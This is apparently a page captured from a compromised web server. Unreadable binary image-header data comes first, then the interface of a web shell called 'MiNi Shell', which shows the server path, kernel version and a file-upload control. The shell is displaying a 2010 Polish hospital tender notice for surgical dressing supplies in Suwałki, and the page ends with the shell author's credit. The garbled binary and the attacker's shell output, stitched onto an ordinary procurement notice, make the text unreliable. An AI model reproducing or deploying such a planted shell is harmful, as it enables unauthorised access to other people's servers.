JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100512/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100512/121239-N-2010.html

<p class="kh_header"><b>Suwałki: Dostawa materiałów opatrunkowych  dla SPSW w Suwałkach - ujętych w pakietach I - III</b><br>
<b>Numer ogłoszenia: 121239 - 2010; data zamieszczenia: 12.05.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Samodzielny Publiczny Szpital Wojewódzki , ul. Szpitalna 60, 16-400 Suwałki, woj. podlaskie, tel. 087 5629582, 5629462, 5629595, faks 087 5629594.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.szpital.suwalki.pl/przetargi</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa materiałów opatrunkowych  dla SPSW w Suwałkach - ujętych w pakietach I - III.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa materiałów opatrunkowych  dla SPSW w Suwałkach - ujętych w pakietach I - III,  w asortymencie i w szacunkowej ilości określonych w załączniku nr 3 (formularze  asortymentowo - cenowe)  do SIWZ w okresie 12 miesięcy..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 33.14.11.10-4.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Warunkiem udziału w postępowaniu o udzielenie zamówienia jest wniesienie wadium w prawidłowej wysokości dla danego pakietu, na który Wykonawca składa ofertę. Kwota wadium dla ofert całkowitych wynosi  5865,00 zł, a dla ofert częściowych, jak niżej:Pakiet I  -    materiał opatrunkowy  2.595,00  zł                                                
Pakiet  II -    materiał opatrunkowy - opaski, podkłady  517,00  zł
Pakiet III -    materiał opatrunkowy - pakiety sterylne, zabiegowe                      2753,00 zł
2.Wadium może być wniesione w pieniądzu, poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo - kredytowej (musi być poręczeniem pieniężnym), gwarancjach bankowych, gwarancjach ubezpieczeniowych oraz poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 roku o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (art.45 ust. 6  PZP). 
3.Wadium musi być udzielane do końca terminu związania ofertą.                                                                                                       4.Wadium wnosi się przed upływem terminu składania ofert.
5.Wadium wnoszone w pieniądzu  wpłaca się  przelewem na poniższy rachunek bankowy Zamawiającego : 

KREDYT BANK  S.A.   1710 Oddział KB S.A. w  Suwałkach  Nr konta  - 42 1500 1719 1217 1002 6998 0000
6.Warunki zwrotu wadium i utraty wadium reguluje ustawa pzp.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Do potwierdzenia oświadczeniem w załączniku nr 5 do SIWZ</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Do potwierdzenia oświadczeniem w załączniku nr 5 do SIWZ</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Do potwierdzenia oświadczeniem w załączniku nr 5 do SIWZ</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Do potwierdzenia oświadczeniem w załączniku nr 5 do SIWZ</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Do potwierdzenia oświadczeniem w załączniku nr 5 do SIWZ</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
</li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">próbki, opisy lub fotografie</li>

<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">1.3.1.Oświadczenia, że oferowany asortyment posiada dokumenty wymagane przez polskie prawo, na podstawie których może być wprowadzony do obrotu i stosowania w placówkach ochrony zdrowia w RP - treść oświadczenia znajduje się w druku oferty, który stanowi załącznik nr 1 do SIWZ
1.3.2.wypełnionego arkusza asortymentowo - cenowego (wzór stanowi załącznik nr  3 do SIWZ)
1.3.3.katalogu (prospektu),  w języku polskim, zawierającego oznaczony oferowany asortyment (pozycja z kodem) i opis  zgodny z wymaganiami w SIWZ - w przypadku firm dysponujących katalogiem (prospektem) zawierającym różny asortyment.  W przypadku firm, które dysponują odrębnymi katalogami (prospektami) dla oferowanego asortymentu, zobowiązane są one do dołączenia do oferty tylko tych katalogów (prospektów), które dotyczą oferowanego asortymentu
1.3.4.próbki oferowanego asortymentu, gotowe do użycia w warunkach szpitalnych - według  załączonego  wykazu  załącznik nr 4 do SIWZ.  Próbki nie podlegają zwrotowi po zakończeniu postępowania.</p></li>



</ul><p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.4.1.wypełnionego druku oferty, który stanowi załącznik nr 1 do SIWZ  
1.4.2.pełnomocnictwa dla osoby składającej ofertę w przypadku działania Wykonawcy przez pełnomocnika
1.4.3.pełnomocnictwa dla pełnomocnika ustanowionego przez wykonawców wspólnie ubiegających się o udzielenie zamówienia, do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego   
1.4.4.kopii dowodu wpłaty wadium wpłaconego w pieniądzu (przelew lub wpłata w kasie Zamawiającego). W pozostałych przypadkach należy załączyć do oferty oryginalny dokument wniesienia wadium.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.szpital.suwalki.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Samodzielny Publiczny Szpital 
Wojewódzki w Suwałkach
ul. Szpitalna 60 
16-400 Suwałki.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 20.05.2010 godzina 10:00, miejsce: Kancelaria Samodzielnego Publicznego Szpitala Wojewódzkiego,                            16-400 Suwałkach, ul. Szpitalna 60.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> PAKIET  I   -   MATERIAŁ OPATRUNKOWY.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lignina  opak a 150g- rolka  ,Lignina  opak  a 5 kg  - arkusze  
 w opakowaniu foliowym chroniącym przed zawilgoceniem ,      Wata opatrunkowa opak  0,5 kg - bawełna- wiskoza, Gaza opatrunkowa  ok. 1 m x0,9 m   17 n   - bawełniana bielona bezchlorowo, klasa IIa,Kompresy gazowe  5 cmx 5 cm
Opak. a 100 sztuk, 13n, 8w, klasa IIa, reguła 7Kompresy gazowe 7,5 cmx 7,5 cm
Opak. a 100 sztuk, 13n, 8w, klasa IIa, reguła 7,Kompresy gazowe   10 cm x 10 cm
Opak.  a 100 sztuk, 13n, 8w,  klasa IIa, reguła 7,Kompresy włókninowe  5 cm x 5 cm,Opak. a 100 sztuk, 4w, klasa IIa, reguła 7,Kompresy włókninowe  7,5 cm x 7,5 cm  -  Opak. a 100 sztuk, 4w, klasa IIa, reguła 7
Kompresy włókninowe  10 cm x 10 cm   - Opak. a 100 sztuk, 4w, klasa IIa, reguła 7
 Kompresy gazowe 5 c x 5 cm   17 n, 8w,   - wymagane sterylizowanie parą wodną, opak.  folia - papier,  pakiet a 5 sztuk, luzem
Kompresy gazowe  7,5 cmx7,5 cm    17n, 8 w,wymagane sterylizowanie parą wodną, opak.  folia - papier, pakiet a  5 sztuk, luzem
Kompresy gazowe  7,5 cm x 7,5 cm  
17n, 8w,  -wymagane sterylizowanie parą wodną, opak. folia - papier, pakieta a 10 sztuk, luzem
Kompresy gazowe 10 cm x 10 cm  17n, 8w  - wymagane sterylizowanie parą wodną, opak.  folia - papier , pakieta a 5 sztuk, luzem
Opaska chirurgiczna gipsowa 3 cm x 12 cm  - obustronnie impregnowana gipsem, czas wiązania 4-6 min, opak a 2 sztuki (minimalana zawartość gipsu naturalnego 94%)
Opaska chirurgiczna gipsowa  3 cm x 14 cm, obustronnie impregnowana gipsem, czas wiązania  4-6 min, opak a 2 sztuki (minimalana zawartość gipsu naturalnego 94%),Przylepiec na włókninie 
2,5 cm x 9,2 m,Przylepiec na tkaninie  2,5 cm x 9,1 m (? 0,1),Przylepiec na tkaninie 5 cm x9,1 m (? 0,1),Przylepiec na porowatej folii2,5 cm x9,2 m
Przylepiec z białego sztucznego jedwabiu    2,5 cm x 9,2 m
Taśma na włókninie 10 cm x 10 m
Taśma na włókninie  15 cm x 10 m
Taśma na włókninie   20 cm xx 10 m     
Opatrunek włókninowy do mocowania kaniul z zaokrąglonymi brzegami, posiadający rozcięcie i dodatkowy element wchłaniający w miejscu wkłucia o wym. 80 x 60 mm
Opatrunek do mocowania kaniul foliowy, Wkłucia obwodowe - pediatryczny rozm. 5 cm  x 5,7 cm
Opatrunek z siatki poliamidowej z maściąna na bazie  trójglocerydów  dodatkowo impregnowany cząstkami hydrokoloidowymi.  Rozm.  10cm x 12 cm
Antybakteyjny opatrunek z siatki poliamidowej, pokryty srebrem metalicznym i impregnowany maścią obojetną rozm. 10x10cm
Antybakteryjny, samoprzylepny, czterowarstwowy chłonny opatrunek na rany pooperacyjne (jedna z warstw zawiera jony srebra) rozmiar 7,2x5cm
Antybakteryjny, samoprzylepny, czterowarstwowy chłonny opatrunek na rany pooperacyjne (jedna z warstw zawiera jony srebra) rozmiar 10x6cm
Antybakteryjny, samoprzylepny, czterowarstwowy chłonny opatrunek na rany pooperacyjne (jedna z warstw zawiera jony srebra) rozmiar 15x6cm.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.11.10-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> PAKIET II  -  MATERIAŁ OPATRUNKOWY (OPASKI, PODKŁADY.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Opaska wiskozowa dziana4 m x 5 cm - brzeg tkany,Opaska wiskozowa dziana
4 m x 10 cm - brzeg tkany,Opaska wiskozowa dziana4 m x 15 cm   - brzeg tkany
Opaska elastyczna tkana z zapinka5 m x 12 cm
Opaska elastyczna tkana z zapinką5m x 15 cm
Podkład rozetkowy na rolce, perforowany co 80 cm,  szer.51 cm, dł, 40 m
Podkłady ginekologiczne 34 cm x 9 cm, opak. a 10 sztuk - nadające się do sterylizacji.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.11.10-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> PAKIET  III   -   MATERIAŁ OPATRUNKOWY (PAKIETY STERYLNE ZABIEGOWE).</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Gaza opatrunkowa  1 m x 1 m, 17n,  opak. a 1 sztuka, opak. papier
Tupfery fasolki  9,5 cm x 9,5 cm, nitka radiacyjna, opak.a 10 sztuk, luzem, opak. folia - papier,Podkład pod gips 10 cm x 3 m  opak. a 1 sztuka
Podkład pod gips15 cm x 3m   opak.  a 1 sztuka
Zestaw do cewnikowania zawierający: pęsetę, nerkę tekturową, kubek plastykowy, kompresy gazowe 17n, 8 w,  10 cm x 10 cm  a 5 sztuk, kule gazowe 20 x20 a 5 sztuk,Serweta operacyjna  45 cm x 70 cm, nitka radiacyjna, tasiemka, opak. folia - papier a 2 szt, 4 w,Serweta operacyjna  45 cm x 45 cm, nitka radiacyjna, tasiemka, opak. folia - papier  a 2 szt, 4w,Kompresy włókninowe  10 cm x 20 cm  4w, opak. folia - papier, pakiet a 4 szt, luzem,Tampon do tamponady tylnej nr 1
1 x 7,5 x 7,5  13n,8w2 x 5 x 5 13n, opak. folia - papier,Tampon do tamponady tylnej nr 2 2 x 5 x 5 17n, 12w- wiązane 2 nitkami   2 wąsy, opak. folia - papier,Tampon do tamponady tylnej nr 31 x 7,5 x 7,5 17n, 16w 2 x 5 x 5  17n, 8w  - wiązane 2 nitkami  2 wąsy, opak. folia - papier,Tampon do tamponady tylnej nr 41 x 10 x 10 13n, 16w 1 x 7,5 x7,5 17n, 16w - wiązane 2 nitkami  2 wąsy, opak. folia - papier,Seton z gazy 2 cm x 2 m , 17n, opak. folia - papier, pakiet a 1 sztuka, luzem
,Tupfer rożek 18 cmx 18 cm  17n, opak. folia - papier, pakiet a 6 szt = 
2 x 3 szt,Seton uszny  15 cm x 1 cm    17n, 8wOpak. folia - papier, pakiet a 2 szt, luzem,Kompresy gazowe  5 cm x 5 cm  17n, 12w,  opak. folia - papier, pakieta15 sztuk,Kompresy gazowe  7,5 cm x 7,5 cm  17n, 12w, opak. folia - papier, pakiet a 20 szt z nitką RTG
Kompresy gazowe  10 cm x 10 cm 17n, 12w, opak. folia - papier, pakiet a 20 szt z nitką RTG,Kompresy gazowe  10 cm x 10 cm 17n, 12w, opak. folia - papier, pakiet a 40 szt = 2 x 20 sztuk, wiązane z nitką RTG,Kompresy gazowe  7,5 cm x 7,5cm
17n, 12w, opak. folia - papier, pakiet a 40 szt = 4 x 10 sztuk, wiązane z nitką RTG
Kompresy neurochirurgiczne o wymiarach 15 mm x 15 mm
Kompresy neurochirurgiczne o wymiarach 30 mm x 30 mm
Kompresy gazowe   10 cm x 20 cm17n,  z nitką radiacyjną  16 w, opak. folia - papier, pakiet a 5 sztuk, wiązane,Kompresy gazowe  10 cm x 20 cm
17n, z nitką radiacyjną 16w, opak. folia - papier, pakiet a 2 szt
Kompresy włókninowe 7,5 cm x 7,5 cm, 4 w,  z nacięciem  o, opak. folia - papier a 2 sztuki   ,Kompresy włókninowe  10 cm x 10 cm,  4 w, 40 gramowe, opak. folia - papier a 10 sztuk
Kompresy włókninowe  10 cm x 10 cm, 4w, 40 gramowe, opak. folia - papier  a  5 sztuk,Kompresy włókninowe 7,5 cm x 7,5 cm, 4 w,  40 gramowe, opak. folia - papier a  5 sztuk,Kompresy włókninowe  5 cm x 5 cm 4w, 40 gramowe, opak. folia - papier  A 5 sztuk,Kompresy włókninowe  5 cm x 5 cm, 4w, 40 gramowe, opak. folia - papier a 3 sztuki,Zestaw do znieczulenia przewodowego zaw.10 szt.kompr 10 cm x10 cm,8w z gazy 13 nitkowej 2 szt serwety z włókniny foliowanej L2 90 cm x 75 cm, 1 szt pęseta plastikowa,Pokrowce na nogi jałowe z włókniny polipropylenowej o gramaturze 35 gm2, rozm.  80cm x 120 cm  para,Oznaczniki chirurgiczne nierozciągliwe, jałowe, wykonane z przędzy poliestrowej z brzegami podwiniętymi do środka, pakowane pojedynczo rozmiar  3 mm x 90 cm
Oznaczniki chirurgiczne nierozciągliwe, jałowe, wykonane z przędzy poliestrowej z brzegami podwiniętymi do środka, pakowane pojedynczo  rozmiar  4 mm x 90 cm.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.11.10-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com